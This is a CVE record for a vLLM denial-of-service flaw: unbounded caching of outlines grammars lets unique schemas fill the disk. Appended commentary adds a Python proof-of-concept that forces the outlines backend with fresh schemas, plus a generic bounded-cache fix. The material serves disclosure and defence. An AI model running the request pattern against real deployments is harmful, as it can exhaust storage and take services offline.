{
  "id": "CVE-2025-29770",
  "sourceIdentifier": "security-advisories@github.com",
  "published": "2025-03-19T16:15:31.977",
  "lastModified": "2025-03-19T16:15:31.977",
  "vulnStatus": "Awaiting Analysis",
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0."
    },
    {
      "lang": "es",
      "value": "vLLM es un motor de inferencia y servicio de alto rendimiento y eficiente en memoria para LLM. La librería outlines es uno de los backends que vLLM utiliza para soportar la salida estructurada (también conocida como decodificación guiada). Outlines proporciona una caché opcional para sus gramáticas compiladas en el sistema de archivos local. Esta caché está activada por defecto en vLLM. Outlines también está disponible por defecto a través del servidor de API compatible con OpenAI. El código afectado en vLLM es vllm/model_executor/guided_decoding/outlines_logits_processors.py, que utiliza incondicionalmente la caché de outlines. Un usuario malintencionado puede enviar un flujo de solicitudes de decodificación muy cortas con esquemas únicos, lo que añade una entrada a la caché por cada solicitud. Esto puede provocar una denegación de servicio si el sistema de archivos se queda sin espacio. Tenga en cuenta que, incluso si vLLM se configuró para usar un backend diferente por defecto, aún es posible seleccionar outlines por solicitud mediante la clave guided_decoding_backend del campo extra_body de la solicitud. Este problema solo afecta al motor V0 y se solucionó en la versión 0.8.0."
    }
  ],
  "metrics": {
    "cvssMetricV31": [
      {
        "source": "security-advisories@github.com",
        "type": "Secondary",
        "cvssData": {
          "version": "3.1",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "attackVector": "NETWORK",
          "attackComplexity": "LOW",
          "privilegesRequired": "LOW",
          "userInteraction": "NONE",
          "scope": "UNCHANGED",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "availabilityImpact": "HIGH"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6
      }
    ]
  },
  "weaknesses": [
    {
      "source": "security-advisories@github.com",
      "type": "Primary",
      "description": [
        {
          "lang": "en",
          "value": "CWE-770"
        }
      ]
    }
  ],
  "references": [
    {
      "url": "https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py",
      "source": "security-advisories@github.com"
    },
    {
      "url": "https://github.com/vllm-project/vllm/pull/14837",
      "source": "security-advisories@github.com"
    },
    {
      "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-mgrm-fgjv-mhv8",
      "source": "security-advisories@github.com"
    }
  ]
}
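
The description above spells out the mechanism: each request carrying a previously unseen schema forces outlines to compile a new grammar and, with the disk cache enabled, persist a new entry. Below is a minimal sketch of that request pattern, assuming a vLLM OpenAI-compatible server at localhost:8000; the model name and schema shape are illustrative placeholders, guided_decoding_backend is the extra_body key named in the advisory, and guided_json is vLLM's documented extra parameter for schema-guided output.

import uuid

from openai import OpenAI

# Assumed local vLLM OpenAI-compatible endpoint; base_url and model are placeholders.
client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")

def unique_schema() -> dict:
    # A schema the server has never seen: outlines compiles a fresh grammar
    # for it, so each such request adds one more entry to the on-disk cache.
    return {
        "type": "object",
        "properties": {uuid.uuid4().hex: {"type": "string"}},
    }

response = client.chat.completions.create(
    model="my-model",                              # placeholder model name
    messages=[{"role": "user", "content": "hi"}],
    max_tokens=1,                                  # very short decode, as described
    extra_body={
        # Forces the outlines backend even if the server's default backend
        # differs, per the guided_decoding_backend note in the description.
        "guided_decoding_backend": "outlines",
        "guided_json": unique_schema(),
    },
)

Repeated calls with fresh schemas grow the cache without bound on a vulnerable deployment (V0 engine, pre-0.8.0), which is the allocation-without-limits pattern that CWE-770 names.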
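The linked pull request (https://github.com/vllm-project/vllm/pull/14837) contains the actual fix that shipped in 0.8.0. Purely as a generic illustration of the CWE-770 remediation pattern, bounding the allocation, and not the vLLM/outlines patch itself, a capped LRU cache might look like:

from collections import OrderedDict
from typing import Any, Hashable, Optional

class BoundedCache:
    """Retain at most max_entries items, evicting least-recently-used ones.

    Illustrative sketch of bounding an allocation (CWE-770); not the code
    used by vLLM or outlines.
    """

    def __init__(self, max_entries: int = 128) -> None:
        self.max_entries = max_entries
        self._data: "OrderedDict[Hashable, Any]" = OrderedDict()

    def get(self, key: Hashable) -> Optional[Any]:
        if key in self._data:
            self._data.move_to_end(key)  # mark as most recently used
            return self._data[key]
        return None

    def put(self, key: Hashable, value: Any) -> None:
        self._data[key] = value
        self._data.move_to_end(key)
        if len(self._data) > self.max_entries:
            self._data.popitem(last=False)  # evict the least recently used

A bound like this trades occasional grammar recompilation for a hard ceiling on storage, which is exactly the property the unbounded on-disk cache lacked.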